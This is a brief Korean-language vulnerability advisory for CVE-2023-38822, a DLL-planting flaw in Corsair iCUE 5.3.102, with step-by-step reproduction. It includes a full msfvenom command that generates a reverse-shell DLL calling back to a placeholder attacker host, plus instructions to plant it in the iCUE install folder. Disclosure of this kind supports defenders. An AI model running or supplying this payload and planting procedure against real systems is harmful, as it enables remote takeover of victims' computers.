Corsair---DLL-심기-CVE-2023-38822
Corsair iCUE v.5.3.102의 DLL 심기 CVE-2023-38822
발견자: Idan Malihi
설명
Corsair iCUE v.5.3.102의 문제로 인해 로컬 공격자가 MPDC.dll, CRYPTSP.dll, dcomp.dll, profapi.dll 및 MSASN1.dll 구성 요소를 통해 임의 코드를 실행할 수 있습니다.
재현 단계
DLL 심기 취약점을 악용하려면 공격자는 다음 단계를 수행해야 합니다:
- iCUE의 최신 버전을 다운로드합니다.
- iCUE 제품을 설치합니다.
- 설치 경로 폴더를 엽니다(예: C:\Program Files\Corsair\Corsair iCUE5 Software).
- Kali Linux OS에서 msfvenom을 사용하여 악성 dll 파일을 생성합니다:
msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o CRYPTSP.dll
- DLL 파일을 게임의 경로 C:\Program Files\Corsair\Corsair iCUE5 Software\로 전송합니다.
- iCUE.exe를 실행하고 리버스 셸을 획득합니다.